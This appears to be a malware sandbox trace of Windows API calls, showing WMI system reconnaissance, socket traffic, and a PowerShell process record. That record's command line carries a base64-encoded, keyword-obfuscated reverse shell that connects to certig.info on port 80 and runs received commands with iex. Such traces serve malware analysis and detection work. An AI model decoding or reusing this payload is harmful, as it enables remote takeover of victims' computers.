	[0267.403] WbemDefPath:IUnknown:Release (This=0x639c460) returned 0x3
	[0267.403] CoGetContextToken (in: pToken=0x5dedc54 | out: pToken=0x5dedc54) returned 0x0
	[0267.403] WbemDefPath:IUnknown:AddRef (This=0x635e8d8) returned 0x4
	[0267.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e8d8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedcc8 | out: ppvObject=0x5dedcc8*=0x0) returned 0x80004002
	[0267.403] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x3
	[0267.403] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x2
	[0267.403] WbemDefPath:IUnknown:Release (This=0x635def8) returned 0x0
	[0267.403] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x1
	[0267.403] CoGetContextToken (in: pToken=0x5dee504 | out: pToken=0x5dee504) returned 0x0
	[0267.403] CoGetContextToken (in: pToken=0x5dee4c4 | out: pToken=0x5dee4c4) returned 0x0
	[0267.403] WbemDefPath:IUnknown:AddRef (This=0x635e8d8) returned 0x2
	[0267.404] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e8d8, riid=0x5dee540*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee53c | out: ppvObject=0x5dee53c*=0x635e8d8) returned 0x0
	[0267.404] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x2
	[0267.404] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x1
	[0267.404] CoGetContextToken (in: pToken=0x5dee584 | out: pToken=0x5dee584) returned 0x0
	[0267.404] CoGetContextToken (in: pToken=0x5dee544 | out: pToken=0x5dee544) returned 0x0
	[0267.404] WbemDefPath:IUnknown:AddRef (This=0x635e8d8) returned 0x2
	[0267.404] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e8d8, riid=0x5dee5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5bc | out: ppvObject=0x5dee5bc*=0x635e8d8) returned 0x0
	[0267.404] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x2
	[0267.404] WbemDefPath:IUnknown:AddRef (This=0x635e8d8) returned 0x3
	[0267.404] WbemDefPath:IWbemPath:SetText (This=0x635e8d8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0267.405] WbemDefPath:IUnknown:Release (This=0x635e8d8) returned 0x2
	[0267.405] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee724 | out: puCount=0x5dee724*=0x2) returned 0x0
	[0267.405] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee720*=0x0, pszText=0x0 | out: puBuffLength=0x5dee720*=0x17, pszText=0x0) returned 0x0
	[0267.405] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee720*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee720*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.405] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0267.405] IUnknown:AddRef (This=0x635eb04) returned 0x3
	[0267.405] IEnumWbemClassObject:Next (in: This=0x635eb04, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x3220a70 | out: apObjects=0x769e88*=0x0, puReturned=0x3220a70*=0x0) returned 0x1
	[0267.407] IUnknown:Release (This=0x635eb04) returned 0x2
	[0267.408] CoGetContextToken (in: pToken=0x5dee5f4 | out: pToken=0x5dee5f4) returned 0x0
	[0267.408] WbemLocator:IUnknown:Release (This=0x7f98ac) returned 0x1
	[0267.408] IUnknown:Release (This=0x635eb04) returned 0x0
	[0267.417] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0267.417] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0267.417] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.417] IWbemClassObject:Get (in: This=0x635eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32218a4*=0, plFlavor=0x32218a8*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x32218a4*=8, plFlavor=0x32218a8*=64) returned 0x0
	[0267.417] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.417] IWbemClassObject:Get (in: This=0x635eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32218a4*=8, plFlavor=0x32218a8*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x32218a4*=8, plFlavor=0x32218a8*=64) returned 0x0
	[0267.417] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.418] IWbemClassObject:Get (in: This=0x635eb40, wszName="__CLASS", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x322195c*=0, plFlavor=0x3221960*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x322195c*=8, plFlavor=0x3221960*=64) returned 0x0
	[0267.418] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.418] IWbemClassObject:Get (in: This=0x635eb40, wszName="__CLASS", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x322195c*=8, plFlavor=0x3221960*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x322195c*=8, plFlavor=0x3221960*=64) returned 0x0
	[0267.418] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0267.418] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.419] IWbemClassObject:GetNames (in: This=0x635eb40, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5dee74c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5dee718 | out: pNames=0x5dee718*="\x01ƀ\x04") returned 0x0
	[0267.419] SafeArrayGetDim (psa=0x7f85c8) returned 0x1
	[0267.419] SafeArrayGetDim (psa=0x7f85c8) returned 0x1
	[0267.419] SafeArrayGetLBound (in: psa=0x7f85c8, nDim=0x1, plLbound=0x5dee314 | out: plLbound=0x5dee314) returned 0x0
	[0267.419] IWbemClassObject:Get (in: This=0x635eb40, wszName="__GENUS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222398*=0, plFlavor=0x322239c*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x3222398*=3, plFlavor=0x322239c*=64) returned 0x0
	[0267.420] IWbemClassObject:Get (in: This=0x635eb40, wszName="__CLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32223cc*=0, plFlavor=0x32223d0*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x32223cc*=8, plFlavor=0x32223d0*=64) returned 0x0
	[0267.420] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.420] IWbemClassObject:Get (in: This=0x635eb40, wszName="__SUPERCLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222430*=0, plFlavor=0x3222434*=0 | out: pVal=0x5dee744*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222430*=8, plFlavor=0x3222434*=64) returned 0x0
	[0267.420] IWbemClassObject:Get (in: This=0x635eb40, wszName="__DYNASTY", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222458*=0, plFlavor=0x322245c*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x3222458*=8, plFlavor=0x322245c*=64) returned 0x0
	[0267.420] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.420] IWbemClassObject:Get (in: This=0x635eb40, wszName="__RELPATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32224bc*=0, plFlavor=0x32224c0*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x32224bc*=8, plFlavor=0x32224c0*=64) returned 0x0
	[0267.421] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0267.421] IWbemClassObject:Get (in: This=0x635eb40, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222540*=0, plFlavor=0x3222544*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x3222540*=3, plFlavor=0x3222544*=64) returned 0x0
	[0267.421] IWbemClassObject:Get (in: This=0x635eb40, wszName="__DERIVATION", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222574*=0, plFlavor=0x3222578*=0 | out: pVal=0x5dee744*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7f85c8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x639c4a0, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x3222574*=8200, plFlavor=0x3222578*=64) returned 0x0
	[0267.421] IWbemClassObject:Get (in: This=0x635eb40, wszName="__SERVER", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32225ac*=0, plFlavor=0x32225b0*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x32225ac*=8, plFlavor=0x32225b0*=64) returned 0x0
	[0267.421] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0267.422] IWbemClassObject:Get (in: This=0x635eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32225f8*=0, plFlavor=0x32225fc*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x32225f8*=8, plFlavor=0x32225fc*=64) returned 0x0
	[0267.422] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.422] IWbemClassObject:Get (in: This=0x635eb40, wszName="__PATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3222648*=0, plFlavor=0x322264c*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x3222648*=8, plFlavor=0x322264c*=64) returned 0x0
	[0267.422] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0267.422] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee7c4 | out: puCount=0x5dee7c4*=0x2) returned 0x0
	[0267.422] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee7c0*=0x0, pszText=0x0 | out: puBuffLength=0x5dee7c0*=0x17, pszText=0x0) returned 0x0
	[0267.422] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee7c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee7c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.422] IWbemClassObject:Get (in: This=0x635eb40, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x5dee780*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x322274c*=0, plFlavor=0x3222750*=0 | out: pVal=0x5dee780*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x322274c*=21, plFlavor=0x3222750*=32) returned 0x0
	[0267.422] SysStringLen (param_1="2146942976") returned 0xa
	[0267.423] IWbemClassObject:Get (in: This=0x635eb40, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x5dee838*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x322274c*=21, plFlavor=0x3222750*=32 | out: pVal=0x5dee838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x322274c*=21, plFlavor=0x3222750*=32) returned 0x0
	[0267.423] SysStringLen (param_1="2146942976") returned 0xa
	[0267.428] send (s=0x420, buf=0x3223240*, len=31, flags=0) returned 31
	[0267.446] GetLastError () returned 0x0
	[0267.446] recv (s=0x420, buf=0x310c8f8, len=502, flags=0) 

Thread:
	id = 332
	os_tid = 0xd24


Thread:
	id = 333
	os_tid = 0xd28


Thread:
	id = 351
	os_tid = 0xd94


Thread:
	id = 357
	os_tid = 0xdb0


Thread:
	id = 360
	os_tid = 0xdc0


Thread:
	id = 363
	os_tid = 0xdcc


Process:
	id = "17"
	image_name = "powershell.exe"
	filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x24632000"
	os_pid = "0x728"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0x864"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGcARABpAHQARgA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABOAFQAawBiAHQAPQAoACQAZwBEAGkAdABGAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABwAG8ASAB6AFkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABnAG0AQwB3AGQAPQAkAE4AVABrAGIAdAAuAFIAZQBhAGQAKAAkAHAAbwBIAHoAWQAsADAALAAkAHAAbwBIAHoAWQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGkAUABCAFoAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcABvAEgAegBZACwAMAAsACQAZwBtAEMAdwBkACkAOwAkAG4ATgBvAHQAbgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAaQBQAEIAWgBtACAAMgA+ACYAMQApACkAOwAkAE4AVABrAGIAdAAuAFcAcgBpAHQAZQAoACQAbgBOAG8AdABuACwAMAAsACQAbgBOAG8AdABuAC4ATABlAG4AZwB0AGgAKQA7ACQATgBUAGsAYgB0AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABnAEQAaQB0AEYALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwBEAGkAdABGAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 228
	os_tid = 0x220

	[0198.495] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0198.781] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0198.781] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0198.781] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0198.781] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0201.208] GetVersionExW (in: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.208] GetLastError () returned 0x2
	[0201.209] GetVersionExW (in: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.209] GetLastError () returned 0x2
	[0201.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0201.322] GetLastError () returned 0x2
	[0201.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae9e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0201.329] GetLastError () returned 0x2
	[0201.329] GetVersionExW (in: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.329] GetLastError () returned 0x2
	[0201.331] SetErrorMode (uMode=0x1) returned 0x1
	[0201.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xaee68 | out: lpFileInformation=0xaee68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0201.333] GetLastError () returned 0x2
	[0201.333] SetErrorMode (uMode=0x1) returned 0x1
	[0201.337] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xaeeec | out: lpdwHandle=0xaeeec) returned 0x94c
	[0201.338] GetLastError () returned 0x0
	[0201.340] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2935ac4 | out: lpData=0x2935ac4) returned 1
	[0201.343] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaeeb8, puLen=0xaeeb4 | out: lplpBuffer=0xaeeb8*=0x2935b60, puLen=0xaeeb4) returned 1
	[0201.346] lstrlenW (lpString="䅁") returned 1
	[0201.501] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935c3c, puLen=0xaee30) returned 1
	[0201.501] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0201.503] lstrcpyW (in: lpString1=0x3582a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0201.504] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935c90, puLen=0xaee30) returned 1
	[0201.504] lstrlenW (lpString="System.Management.Automation") returned 28
	[0201.504] lstrcpyW (in: lpString1=0x3582a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0201.504] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935cec, puLen=0xaee30) returned 1
	[0201.504] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0201.504] lstrcpyW (in: lpString1=0x3582a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0201.504] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935d2c, puLen=0xaee30) returned 1
	[0201.504] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0201.504] lstrcpyW (in: lpString1=0x3582a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0201.504] VerQueryValueW (in: pBlock=0x2935ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xaee34, puLen=0xaee30 | out: lplpBuffer=0xaee34*=0x2935d94, puLen=0xaee30) returned 1
	[0201.504] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0201.505] lstrcpyW (in: lpString1=0x3582a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
